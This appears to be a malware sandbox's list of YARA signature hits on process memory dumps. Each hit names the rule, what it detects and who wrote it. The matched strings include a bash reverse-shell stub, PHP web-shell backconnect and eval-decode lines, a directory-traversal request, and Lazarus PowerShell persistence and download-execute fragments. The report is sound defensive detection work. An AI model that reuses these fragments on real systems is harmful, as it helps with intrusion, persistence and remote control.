0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Obfuscated_JS_April17 | Detects cloaked Mimikatz in JS obfuscation | Florian Roth | - 0x1b6de:$s1: ";function Main(){for(var
- 0x1b6fd:$s2: =String.fromCharCode(parseInt(
- 0x1b720:$s3: ));(new Function(
|
0000000A.00000003.324570617.0000000006668000.00000004.00000001.sdmp | Hacktool_Strings_p0wnedShell | p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs | Florian Roth | - 0x4558:$x5: p0wnedShellx64
|
0000000A.00000003.323986177.0000000002E7D000.00000004.00000001.sdmp | scanarator | Auto-generated rule on file scanarator.exe | yarGen Yara Rule Generator by Florian Roth | - 0x1f78:$s4: GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0
|
0000000A.00000003.323415245.0000000006628000.00000004.00000001.sdmp | webshell_webshells_new_PHP1 | Web shells - generated from file PHP1.php | Florian Roth | - 0x430:$s3: @preg_replace("/f/e",$_GET['u'],"fengjiao");
|
0000000A.00000003.323415245.0000000006628000.00000004.00000001.sdmp | h4ntu_shell__powered_by_tsoi_ | Semi-Auto-generated - file h4ntu shell [powered by tsoi | unknown | |
0000000A.00000003.313108656.0000000006641000.00000004.00000001.sdmp | FVEY_ShadowBroker_Auct_Dez16_Strings | String from the ShodowBroker Files Screenshots - Dec 2016 | Florian Roth | - 0x999e:$s2: Auditcleaner
- 0x7ece:$elf12: envoytomato
- 0x7f2e:$elf14: estopmoonlit
|
00000013.00000003.458084749.0000000006D9C000.00000004.00000001.sdmp | shankar_php_php | Semi-Auto-generated - file shankar.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | |
00000013.00000003.438854953.0000000006BFE000.00000004.00000001.sdmp | multiple_webshells_0015 | Semi-Auto-generated - from files wacking.php.php.txt, 1.txt, SpecialShell_99.php.php.txt, c100.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x215:$s1: $_POST['backconnectip']
|
00000013.00000003.438854953.0000000006BFE000.00000004.00000001.sdmp | Webshell_27_9_acid_c99_locus7s | Detects Webshell - rule generated from from files 27.9.txt, acid.php, c99_locus7s.txt | Florian Roth | - 0x1f8:$s0: $blah = ex($p2." /tmp/back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
|
00000013.00000003.443343261.0000000006BFE000.00000004.00000001.sdmp | multiple_webshells_0015 | Semi-Auto-generated - from files wacking.php.php.txt, 1.txt, SpecialShell_99.php.php.txt, c100.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x215:$s1: $_POST['backconnectip']
|
00000013.00000003.443343261.0000000006BFE000.00000004.00000001.sdmp | Webshell_27_9_acid_c99_locus7s | Detects Webshell - rule generated from from files 27.9.txt, acid.php, c99_locus7s.txt | Florian Roth | - 0x1f8:$s0: $blah = ex($p2." /tmp/back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
|
00000013.00000002.524614024.000000000242B000.00000004.00000001.sdmp | Amplia_Security_Tool | Amplia Security Tool | unknown | - 0x13a087:$a: Amplia Security
- 0x13a1ff:$a: Amplia Security
- 0x13a21d:$c: getlsasrvaddr.exe
- 0x13a23d:$d: Cannot get PID of LSASS.EXE
- 0x13a267:$e: extract the TGT session key
- 0x13a291:$f: PPWDUMP_DATA
|
00000013.00000002.524614024.000000000242B000.00000004.00000001.sdmp | scanarator | Auto-generated rule on file scanarator.exe | yarGen Yara Rule Generator by Florian Roth | - 0x139fbb:$s4: GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0
|
00000013.00000003.470647242.0000000006B9B000.00000004.00000001.sdmp | webshell_PHP_b37 | Web Shell - file b37.php | Florian Roth | - 0x220:$s0: xmg2/G4MZ7KpNveRaLgOJvBcqa2A8/sKWp9W93NLXpTTUgRc
|
00000013.00000003.428675269.0000000006B79000.00000004.00000001.sdmp | webshell_PHP_b37 | Web Shell - file b37.php | Florian Roth | - 0x22220:$s0: xmg2/G4MZ7KpNveRaLgOJvBcqa2A8/sKWp9W93NLXpTTUgRc
|
00000013.00000003.428675269.0000000006B79000.00000004.00000001.sdmp | Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit_php | Semi-Auto-generated - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x191db:$s1: Liz0ziM Private Safe Mode Command Execuriton Bypass
|
0000000A.00000002.552309239.00000000036C7000.00000004.00000001.sdmp | Amplia_Security_Tool | Amplia Security Tool | unknown | - 0x32bc:$a: Amplia Security
- 0x38ac:$a: Amplia Security
|
0000000A.00000003.310922017.00000000050BA000.00000004.00000001.sdmp | Amplia_Security_Tool | Amplia Security Tool | unknown | - 0x79d0:$a: Amplia Security
|
0000000A.00000003.310922017.00000000050BA000.00000004.00000001.sdmp | webshell_r57shell127_r57_iFX_r57_kartal_r57_antichat | Web Shell - from files r57shell127.php, r57_iFX.php, r57_kartal.php, r57.php, antichat.php | Florian Roth | - 0x7bf8:$s8: if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
- 0x7d38:$s9: foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
|
0000000A.00000003.310922017.00000000050BA000.00000004.00000001.sdmp | Safe0ver_Shell__Safe_Mod_Bypass_By_Evilc0der_php | Semi-Auto-generated - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | |
0000000A.00000003.325437911.0000000006654000.00000004.00000001.sdmp | Empire_Invoke_Shellcode | Empire - a pure PowerShell post-exploitation agent - file Invoke-Shellcode.ps1 | Florian Roth | - 0x308:$s2: "Injecting shellcode injecting into $((Get-Process -Id $ProcessId).ProcessName) ($ProcessId)!" ) )
|
0000000A.00000003.325437911.0000000006654000.00000004.00000001.sdmp | Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit_php | Semi-Auto-generated - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x48b:$s1: Liz0ziM Private Safe Mode Command Execuriton Bypass
|
0000000A.00000003.322843197.000000000684B000.00000004.00000001.sdmp | webshell_jsp_cmdjsp | Web Shell - file cmdjsp.jsp | Florian Roth | - 0xd88:$s5: <FORM METHOD=GET ACTION='cmdjsp.jsp'>
|
0000000A.00000003.322843197.000000000684B000.00000004.00000001.sdmp | webshell_sig_404super | Web shells - generated from file 404super.php | Florian Roth | - 0xc08:$s4: $i = pack('c*', 0x70, 0x61, 99, 107);
|
0000000A.00000003.322843197.000000000684B000.00000004.00000001.sdmp | webshell_webshells_new_Asp | Web shells - generated from file Asp.asp | Florian Roth | - 0xdc8:$s1: Execute MorfiCoder(")/*/z/*/(tseuqer lave")
|
00000013.00000003.485624536.0000000006BFE000.00000004.00000001.sdmp | multiple_webshells_0015 | Semi-Auto-generated - from files wacking.php.php.txt, 1.txt, SpecialShell_99.php.php.txt, c100.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x215:$s1: $_POST['backconnectip']
|
00000013.00000003.485624536.0000000006BFE000.00000004.00000001.sdmp | Webshell_27_9_acid_c99_locus7s | Detects Webshell - rule generated from from files 27.9.txt, acid.php, c99_locus7s.txt | Florian Roth | - 0x1f8:$s0: $blah = ex($p2." /tmp/back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
|
00000013.00000003.458213135.0000000006DE1000.00000004.00000001.sdmp | Amplia_Security_Tool | Amplia Security Tool | unknown | - 0x4caf0:$c: getlsasrvaddr.exe
- 0x50420:$e: extract the TGT session key
|
00000013.00000003.458213135.0000000006DE1000.00000004.00000001.sdmp | SQLMap | This signature detects the SQLMap SQL injection tool | Florian Roth | - 0x5e6f0:$s1: except SqlmapBaseException, ex:
|
00000013.00000003.458213135.0000000006DE1000.00000004.00000001.sdmp | PortRacer | Auto-generated rule on file PortRacer.exe | yarGen Yara Rule Generator by Florian Roth | - 0x50090:$s0: Auto Scroll BOTH Text Boxes
- 0x504e0:$s4: Start/Stop Portscanning
- 0x5e6b8:$s6: Auto Save LogFile by pressing STOP
|
00000013.00000003.422640827.00000000051E4000.00000004.00000001.sdmp | Amplia_Security_Tool | Amplia Security Tool | unknown | - 0xf580:$a: Amplia Security
|
00000013.00000003.422640827.00000000051E4000.00000004.00000001.sdmp | Fierce2 | This signature detects the Fierce2 domain scanner | Florian Roth | - 0xf398:$s1: $tt_xml->process( 'end_domainscan.tt', $end_domainscan_vars,
|
00000013.00000003.422640827.00000000051E4000.00000004.00000001.sdmp | webshell_Shell_ci_Biz_was_here_c100_v_xxx | Web Shell - from files Shell [ci | unknown | - 0xf758:$s3: <OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null"
- 0xf1b8:$s7: <OPTION VALUE="wget http://ftp.powernet.com.tr/supermail/de
|
00000013.00000003.422640827.00000000051E4000.00000004.00000001.sdmp | Safe0ver_Shell__Safe_Mod_Bypass_By_Evilc0der_php | Semi-Auto-generated - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | |
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp | Volgmer_Malware | Detects Volgmer malware as reported in US CERT TA17-318B | Florian Roth | - 0x22fc2:$x1: User-Agent: Mozillar/5.0
- 0x23002:$x3: [TestConnect To Bot] - Port = %d
- 0x23027:$x4: b50a338264226b6d57c1936d9db140ba74a28930270a083353645a9b518661f4fcea160d7
- 0x2308a:$s2: H_%s_%016I64X_%04d%02d%02d%02d%02d%02d.TXT
- 0x230d5:$s4: %s\dllcache\%s.dll
- 0x230ec:$s5: Cond Fail.
- 0x230fb:$s6: The %s %s%s
- 0x2310b:$s7: %s "%s"%s "%s" %s "%s"
- 0x23126:$s8: DLL_Spider.dll
|
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp | RemCom_RemoteCommandExecution | Detects strings from RemCom tool | Florian Roth | - 0x1ee2c:$: \\.\pipe\%s%s%d
- 0x1ee3e:$: %s\pipe\%s%s%d%s
- 0x1ee51:$: \ADMIN$\System32\%s%s
|
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp | ProcessInjector_Gen | Detects a process injection utility that can be used ofr good and bad purposes | Florian Roth | - 0x10fd0:$x1: Error injecting remote thread in process:
- 0x10ffe:$s5: [-] Error getting access to process: %ld!
- 0x1102c:$s6: --process-name <name> Process name to inject
- 0x1105f:$s12: No injection target has been provided!
- 0x1108b:$s17: [-] An app path is required when not injecting!
|
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp | Lazagne_PW_Dumper | Detects Lazagne PW Dumper | Markus Neis / Florian Roth | - 0x13510:$s1: Crypto.Hash
- 0x13520:$s2: laZagne
- 0x1352c:$s3: impacket.winregistry
|
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp | SUSP_shellpop_Bash | Detects susupicious bash command | Tobias Michalski | - 0xce91:$: /bin/bash -i >& /dev/tcp/
|
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp | GoldDragon_Aux_File | Detects export from Gold Dragon - February 2018 | Florian Roth | - 0x1b5ff:$x1: /////////////////////regkeyenum////////////
- 0x1b8ac:$x1: /////////////////////regkeyenum////////////
|
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp | VBS_dropper_script_Dec17_1 | Detects a supicious VBS script that drops an executable | Florian Roth | - 0x1ec7d:$s1: TVpTAQEAAAAEAA
- 0x1ec90:$s2: TVoAAAAAAAAAAA
- 0x1eca3:$s3: TVqAAAEAAAAEAB
- 0x1ecb6:$s4: TVpQAAIAAAAEAA
- 0x1ecc9:$s5: TVqQAAMAAAAEAA
- 0x223c6:$s5: TVqQAAMAAAAEAA
- 0x24783:$s5: TVqQAAMAAAAEAA
- 0x1ecdc:$a1: = CreateObject("Wscript.Shell")
|
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp | Lazarus_Dec_17_5 | Detects Lazarus malware from incident in Dec 2017 | Florian Roth | - 0x20484:$x1: $ProID = Start-Process powershell.exe -PassThru -WindowStyle Hidden -ArgumentList
- 0x204da:$x2: $respTxt = HttpRequestFunc_doprocess -szURI $szFullURL -szMethod $szMethod -contentData $contentData;
- 0x20544:$x3: [String]$PS_PATH = "C:\\Users\\Public\\Documents\\ProxyAutoUpdate.ps1";
- 0x20590:$x4: $cmdSchedule = 'schtasks /create /tn "ProxyServerUpdater"
- 0x205ce:$x5: /tr "powershell.exe -ep bypass -windowstyle hidden -file
- 0x2060c:$x6: C:\\Users\\Public\\Documents\\tmp' + -join
- 0x2063c:$x7: $cmdResult = cmd.exe /c $cmdInst | Out-String;
- 0x2066f:$x8: whoami /groups | findstr /c:"S-1-5-32-544"
|
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp | APT_Turla_Agent_BTZ_Gen_1 | Detects Turla Agent.BTZ | Florian Roth | - 0xaa9a:$x1: 1dM3uu4j7Fw4sjnbcwlDqet4F7JyuUi4m5Imnxl1pzxI6as80cbLnmz54cs5Ldn4ri3do5L6gs923HL34x2f5cvd0fk6c1a0s
- 0x1182c:$x1: 1dM3uu4j7Fw4sjnbcwlDqet4F7JyuUi4m5Imnxl1pzxI6as80cbLnmz54cs5Ldn4ri3do5L6gs923HL34x2f5cvd0fk6c1a0s
- 0xab00:$s1: release mutex - %u (%u)(%u)
- 0xab20:$s2: \system32\win.com
- 0x119af:$s2: \system32\win.com
- 0xab36:$s3: Command Id:%u%010u(%02d:%02d:%02d %02d/%02d/%04d)
- 0xab6c:$s4: MakeFile Error(%d) copy file to temp file %s
- 0xab9d:$s5: %s%%s08x.tmp
- 0xabae:$s6: Run instruction: %d ID:%u%010u(%02d:%02d:%02d %02d/%02d/%04d)
- 0xabf0:$s7: Mutex_Log
- 0xabfe:$s8: %s\system32\winview.ocx
- 0xac49:$s10: Error: pos(%d) > CmdSize(%d)
- 0xac6b:$s11: \win.com
- 0xac79:$s12: Error(%d) run %s
- 0xac90:$s13: %02d.%02d.%04d Log begin:
- 0x11991:$s13: %02d.%02d.%04d Log begin:
|
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp | Suspicious_BAT_Strings | Detects a string also used in Netwire RAT auxilliary | Florian Roth | - 0x1ddc6:$s1: ping 192.0.2.2 -n 1
|
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp | Turla_Mal_Script_Jan18_1 | Detects Turla malicious script | Florian Roth | - 0x1dfe1:$s1: .charCodeAt(i %
- 0x1dff6:$s2: {WScript.Quit();}
- 0x1e00c:$s3: .charAt(i)) << 10) |
- 0x1e025:$s4: = WScript.Arguments;var
- 0x1e043:$s5: = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";var i;
|
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp | VBS_Obfuscated_Mal_Feb18_1 | Detects malicious obfuscated VBS observed in February 2018 | Florian Roth | - 0x191c2:$x1: A( Array( (1* 2^1 )+
- 0x191db:$x2: .addcode(A( Array(
- 0x191f2:$x3: false:AA.send:Execute(AA.responsetext):end
- 0x19221:$x4: & A( Array( (1* 2^1 )+
- 0x1923d:$s1: .SYSTEMTYPE:NEXT:IF (UCASE(
- 0x1925d:$s2: A = STR:next:end function
- 0x1927b:$s3: &WSCRIPT.SCRIPTFULLNAME&CHR
|
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp | LokiBot_Dropper_ScanCopyPDF_Feb18 | Auto-generated rule - file Scan Copy.pdf.com | Florian Roth | - 0x186b5:$a1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
- 0x188a1:$a1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
- 0x18708:$s2: Unstalled2
|
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp | LokiBot_Dropper_Packed_R11_Feb18 | Auto-generated rule - file scan copy.pdf.r11 | Florian Roth | - 0x186b5:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
- 0x188a1:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
|
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp | PowerShell_Susp_Parameter_Combo | Detects PowerShell invocation with suspicious parameters | Florian Roth | - 0x21763:$sa1: -enc
- 0x217a0:$sb2: -window hidden
- 0x204b3:$sb3: -WindowStyle Hidden
- 0x205ec:$sb3: -windowstyle hidden
- 0xcbcc:$sc1: -nop
- 0xcbd1:$se1: -ep bypass
- 0x205e1:$se1: -ep bypass
- 0x21756:$se2: -exec bypass
- 0x21793:$se2: -exec bypass
- 0x1ac36:$se3: -ExecutionPolicy Bypass
- 0x21756:$se4: -exec bypass
- 0x21793:$se4: -exec bypass
|
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp | Armitage_msfconsole | Detects Armitage component | Florian Roth | - 0x1fb30:$s1: \umeterpreter\u >
- 0x1fb46:$s3: ^meterpreter >
- 0x1fb5a:$s11: \umsf\u>
|
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp | Armitage_OSX | Detects Armitage component | Florian Roth | - 0x1fc7a:$x1: resources/covertvpn-injector.exe
- 0x1fca0:$s10: resources/browserpivot.x64.dll
- 0x1fcc4:$s17: resources/msfrpcd_new.bat
|
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp | Silence_malware_2 | Detects malware sample mentioned in the Silence report on Securelist | Florian Roth | - 0x24c3a:$x1: \ScreenMonitorService\Release\smmsrv.pdb
- 0x24c67:$x2: \\.\pipe\{73F7975A-A4A2-4AB6-9121-AECAE68AABBB}
- 0x24c9b:$s1: My Sample Service: ServiceMain: SetServiceStatus returned error
- 0x24cdf:$s2: \mss.exe
- 0x24cec:$s3: \out.dat
- 0x24cf9:$s4: \mss.txt
- 0x24d06:$s5: Default monitor
|
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp | Invoke_Mimikatz | Detects Invoke-Mimikatz String | Florian Roth | - 0x24798:$x3: Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $GetCommandLineWAddrTemp
|
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp | CoinMiner_Strings | Detects mining pool protocol string in Executable | Florian Roth | - 0x1e52c:$s1: stratum+tcp://
- 0x1e53f:$s2: "normalHashing": true,
|
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp | MAL_unspecified_Jan18_1 | Detects unspecified malware sample | Florian Roth | - 0x1dd71:$s1: User-Agent: Mozilla/4.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
- 0x1ddc6:$s2: ping 192.0.2.2 -n 1 -w %d >nul 2>&1
- 0x1ddee:$s3: [Log Started] - [%.2d/%.2d/%d %.2d:%.2d:%.2d]
- 0x1de20:$s4: start /b "" cmd /c del "%%~f0"&exit /b
- 0x1de4b:$s5: [%s] - [%.2d/%.2d/%d %.2d:%.2d:%.2d]
- 0x1de74:$s6: %s\%s.bat
- 0x1de82:$s7: DEL /s "%s" >nul 2>&1
|
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp | Invoke_PSImage | Detects a command to execute PowerShell from String | Florian Roth | - 0x207f2:$: IEX([System.Text.Encoding]::ASCII.GetString(
- 0x20821:$: System.Drawing.Bitmap((a Net.WebClient).OpenRead(
- 0x20855:$: 89 50 4E 47 0D 0A 1A 0A 00 00 00 0D 49 48 44 52 00 00 04 E4 00 00 03 A0 08 06 00 00 00 9D AF A9 ...
|
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp | malware_apt15_royaldll | DLL implant, originally rights.dll and runs as a service | David Cannings | - 0x1488f:$: Nwsapagent
- 0x1487a:$: "%s">>"%s"\s.txt
- 0x1483a:$: del c:\windows\temp\r.exe /f /q
|
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp | JoeSecurity_Coinhive | Yara detected Coinhive miner | Joe Security | |
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp | JoeSecurity_WebMonitor | Yara detected WebMonitor RAT | Joe Security | |
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp | JoeSecurity_MiniRAT | Yara detected Mini RAT | Joe Security | |
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp | JoeSecurity_ComRAT_XORKey | Yara detected Turla ComRAT XORKey | Joe Security | |
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | |
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp | netwire | detect netwire in memory | JPCERT/CC Incident Response Group | - 0x1ddc6:$ping: ping 192.0.2.2
- 0x1ddee:$log: [Log Started] - [%.2d/%.2d/%d %.2d:%.2d:%.2d]
|
0000000A.00000003.312268650.0000000006667000.00000004.00000001.sdmp | Hacktool_Strings_p0wnedShell | p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs | Florian Roth | - 0x5558:$x5: p0wnedShellx64
|
0000000A.00000003.324870228.0000000006654000.00000004.00000001.sdmp | Empire_Invoke_Shellcode | Empire - a pure PowerShell post-exploitation agent - file Invoke-Shellcode.ps1 | Florian Roth | - 0x308:$s2: "Injecting shellcode injecting into $((Get-Process -Id $ProcessId).ProcessName) ($ProcessId)!" ) )
|
0000000A.00000003.324870228.0000000006654000.00000004.00000001.sdmp | Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit_php | Semi-Auto-generated - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x48b:$s1: Liz0ziM Private Safe Mode Command Execuriton Bypass
|
00000013.00000003.441709320.0000000006BFE000.00000004.00000001.sdmp | multiple_webshells_0015 | Semi-Auto-generated - from files wacking.php.php.txt, 1.txt, SpecialShell_99.php.php.txt, c100.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x215:$s1: $_POST['backconnectip']
|
00000013.00000003.441709320.0000000006BFE000.00000004.00000001.sdmp | Webshell_27_9_acid_c99_locus7s | Detects Webshell - rule generated from from files 27.9.txt, acid.php, c99_locus7s.txt | Florian Roth | - 0x1f8:$s0: $blah = ex($p2." /tmp/back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
|
00000013.00000003.481501193.0000000006DCE000.00000004.00000001.sdmp | Amplia_Security_Tool | Amplia Security Tool | unknown | |
0000000A.00000003.324781029.00000000068E9000.00000004.00000001.sdmp | Amplia_Security_Tool | Amplia Security Tool | unknown | - 0x11d0:$a: Amplia Security
- 0x1180:$c: getlsasrvaddr.exe
|
00000013.00000003.473662008.0000000006B9B000.00000004.00000001.sdmp | webshell_PHP_b37 | Web Shell - file b37.php | Florian Roth | - 0x220:$s0: xmg2/G4MZ7KpNveRaLgOJvBcqa2A8/sKWp9W93NLXpTTUgRc
|
00000013.00000003.481442342.0000000006D9C000.00000004.00000001.sdmp | shankar_php_php | Semi-Auto-generated - file shankar.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | |
0000000A.00000003.325135478.0000000006854000.00000004.00000001.sdmp | shankar_php_php | Semi-Auto-generated - file shankar.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | |
00000013.00000003.463235186.0000000006E38000.00000004.00000001.sdmp | SQLMap | This signature detects the SQLMap SQL injection tool | Florian Roth | - 0x76f0:$s1: except SqlmapBaseException, ex:
|
00000013.00000003.470663077.0000000006BA5000.00000004.00000001.sdmp | Hacktool_Strings_p0wnedShell | p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs | Florian Roth | - 0x8818:$x5: p0wnedShellx64
|
0000000A.00000003.324504797.0000000006892000.00000004.00000001.sdmp | Amplia_Security_Tool | Amplia Security Tool | unknown | |
0000000A.00000003.325168966.0000000006892000.00000004.00000001.sdmp | Amplia_Security_Tool | Amplia Security Tool | unknown | |
00000013.00000003.477379778.00000000051F3000.00000004.00000001.sdmp | Amplia_Security_Tool | Amplia Security Tool | unknown | - 0x580:$a: Amplia Security
|
00000013.00000003.477379778.00000000051F3000.00000004.00000001.sdmp | Fierce2 | This signature detects the Fierce2 domain scanner | Florian Roth | - 0x398:$s1: $tt_xml->process( 'end_domainscan.tt', $end_domainscan_vars,
|
00000013.00000003.477379778.00000000051F3000.00000004.00000001.sdmp | webshell_Shell_ci_Biz_was_here_c100_v_xxx | Web Shell - from files Shell [ci | unknown | - 0x758:$s3: <OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null"
- 0x1b8:$s7: <OPTION VALUE="wget http://ftp.powernet.com.tr/supermail/de
|
00000013.00000003.477379778.00000000051F3000.00000004.00000001.sdmp | Safe0ver_Shell__Safe_Mod_Bypass_By_Evilc0der_php | Semi-Auto-generated - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | |
0000000A.00000003.312103557.0000000006629000.00000004.00000001.sdmp | FVEY_ShadowBroker_Auct_Dez16_Strings | String from the ShodowBroker Files Screenshots - Dec 2016 | Florian Roth | - 0x2199e:$s2: Auditcleaner
- 0x1fece:$elf12: envoytomato
- 0x1ff2e:$elf14: estopmoonlit
|
00000013.00000002.541755283.0000000002FA0000.00000004.00000040.sdmp | Amplia_Security_Tool | Amplia Security Tool | unknown | |
00000013.00000003.455300807.0000000006D6F000.00000004.00000001.sdmp | webshell_php_gzinflated | PHP webshell which directly eval()s obfuscated string | Arnim Rupp | - 0x12e80:$php: <?
- 0x15668:$php: <?
- 0x16959:$php: <?
- 0x18dd8:$php: <?
- 0x18dde:$payload3: eval(gzuncompress(base64_decode(
|
00000013.00000003.455300807.0000000006D6F000.00000004.00000001.sdmp | webshell_php_h6ss | Web Shell - file h6ss.php | Florian Roth | - 0x18dd8:$s0: <?php eval(gzuncompress(base64_decode("
|
00000013.00000003.477128932.00000000052EB000.00000004.00000001.sdmp | FVEY_ShadowBroker_Auct_Dez16_Strings | String from the ShodowBroker Files Screenshots - Dec 2016 | Florian Roth | - 0x1f5e:$s2: Auditcleaner
- 0x36a6:$s11: elatedmonkey
- 0x3716:$elf4: charm_saver
- 0x276e:$elf12: envoytomato
- 0x273e:$elf14: estopmoonlit
- 0x38d7:$elf17: ghost_sparc
- 0x31c6:$elf19: orleans_stride
- 0x2ec6:$elf21: seconddate
- 0x3716:$pe2: charm_saver
- 0x38e3:$pe3: ghost_x86
|
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp | Volgmer_Malware | Detects Volgmer malware as reported in US CERT TA17-318B | Florian Roth | - 0x1bfc2:$x1: User-Agent: Mozillar/5.0
- 0x1c002:$x3: [TestConnect To Bot] - Port = %d
- 0x1c027:$x4: b50a338264226b6d57c1936d9db140ba74a28930270a083353645a9b518661f4fcea160d7
- 0x1c08a:$s2: H_%s_%016I64X_%04d%02d%02d%02d%02d%02d.TXT
- 0x1c0d5:$s4: %s\dllcache\%s.dll
- 0x1c0ec:$s5: Cond Fail.
- 0x1c0fb:$s6: The %s %s%s
- 0x1c10b:$s7: %s "%s"%s "%s" %s "%s"
- 0x1c126:$s8: DLL_Spider.dll
|
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp | RemCom_RemoteCommandExecution | Detects strings from RemCom tool | Florian Roth | - 0x17e2c:$: \\.\pipe\%s%s%d
- 0x17e3e:$: %s\pipe\%s%s%d%s
- 0x17e51:$: \ADMIN$\System32\%s%s
|
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp | ProcessInjector_Gen | Detects a process injection utility that can be used ofr good and bad purposes | Florian Roth | - 0x9fd0:$x1: Error injecting remote thread in process:
- 0x9ffe:$s5: [-] Error getting access to process: %ld!
- 0xa02c:$s6: --process-name <name> Process name to inject
- 0xa05f:$s12: No injection target has been provided!
- 0xa08b:$s17: [-] An app path is required when not injecting!
|
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp | Lazagne_PW_Dumper | Detects Lazagne PW Dumper | Markus Neis / Florian Roth | - 0xc510:$s1: Crypto.Hash
- 0xc520:$s2: laZagne
- 0xc52c:$s3: impacket.winregistry
|
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp | SUSP_shellpop_Bash | Detects susupicious bash command | Tobias Michalski | - 0x5e91:$: /bin/bash -i >& /dev/tcp/
|
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp | GoldDragon_Aux_File | Detects export from Gold Dragon - February 2018 | Florian Roth | - 0x145ff:$x1: /////////////////////regkeyenum////////////
- 0x148ac:$x1: /////////////////////regkeyenum////////////
|
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp | VBS_dropper_script_Dec17_1 | Detects a supicious VBS script that drops an executable | Florian Roth | - 0x17c7d:$s1: TVpTAQEAAAAEAA
- 0x17c90:$s2: TVoAAAAAAAAAAA
- 0x17ca3:$s3: TVqAAAEAAAAEAB
- 0x17cb6:$s4: TVpQAAIAAAAEAA
- 0x17cc9:$s5: TVqQAAMAAAAEAA
- 0x1b3c6:$s5: TVqQAAMAAAAEAA
- 0x1d783:$s5: TVqQAAMAAAAEAA
- 0x17cdc:$a1: = CreateObject("Wscript.Shell")
|
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp | Lazarus_Dec_17_5 | Detects Lazarus malware from incident in Dec 2017 | Florian Roth | - 0x19484:$x1: $ProID = Start-Process powershell.exe -PassThru -WindowStyle Hidden -ArgumentList
